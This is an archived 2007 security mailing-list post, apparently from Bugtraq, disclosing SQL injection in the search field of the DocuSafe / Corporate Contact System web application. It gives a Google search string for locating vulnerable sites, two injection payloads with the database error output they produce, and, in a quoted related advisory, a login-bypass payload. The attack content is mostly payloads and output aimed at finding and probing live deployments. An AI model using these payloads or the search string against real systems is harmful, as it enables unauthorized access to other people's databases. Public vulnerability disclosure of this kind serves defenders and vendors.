DocuSafe "Search" SQL Injection

From: No-Reply@xxxxxxxxxxxxxxxxx
Date: 13 Nov 2007 23:28:13 -0000

DocuSafe "Search" SQL Injection

Aria-Security Team,
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal
Vendor: http://gartha.net
Google Search: intitle:Corporate Contact System

insert your command in the section "search"
example:
'having 1=1--
Result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)

Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.

or
'group by tblMain.fldArtNr having 1=1--
result:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)

Like ''group by tblMain.fldArtNr having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.

/includes/common.asp, line 62

Regards,
The-0utl4w
Credits Goes To Aria-Security.Net

Prev by Date: Free Forums "search" Sql Injection
Next by Date: Konqueror Remote Denial Of Service
Previous by thread: Free Forums "search" Sql Injection
Next by thread: Konqueror Remote Denial Of Service
Index(es):
- Date
- Thread

Relevant Pages

Aria-Security.Net Research: Rapid Classified HotList Image
... Shout Outs: AurA, imm02tal ... Vendor: http://www.freshink.net/rc-links.htm ... Google Search: Developed by: GA Soft ... Username: anything' OR 'x'='x ...
(Bugtraq)
Re: event viewer error..
... Using MSCONFIG is one way to check for MS/non-MS services but it's possible ... for a rogue file to masquerade as an MS service. ... Check the command line for the service. ... A Google search using that service's name as the search term brings up ...
(microsoft.public.windowsxp.general)
Re: Setting samplerate on /dev/dsp
... > are 8bit mono sound, i want to know how to set the samplerate and ... > mono/stereo from the command line, a google search showed me only how to ... > samplerate before capture? ...
(Debian-User)
Re: Query: CA-MIM ENQ Processing Mode
... can always find the ones your not processing with a DISPLAY COUNTS command. ... This was sorely missed as I always looked at the report to find any new ... enq's that were being issued so I could call the vendor and see if they ... For IBM-MAIN subscribe / signoff / archive access instructions, send email to listserv@xxxxxxxxxxx with the message: GET IBM-MAIN INFO Search the archives at http://bama.ua.edu/archives/ibm-main.html. ...
(bit.listserv.ibm-main)
Re: Goat needed
... SCSI BUS has been reset. ... Vendor: FUJITSU Model: MAG3182L SUN18G Rev: 1111 ... Vendor: TOSHIBA Model: XM6201TASUN32XCD Rev: 1103 ... sym0:0:0: tagged command queuing enabled, ...
(comp.periphs.scsi)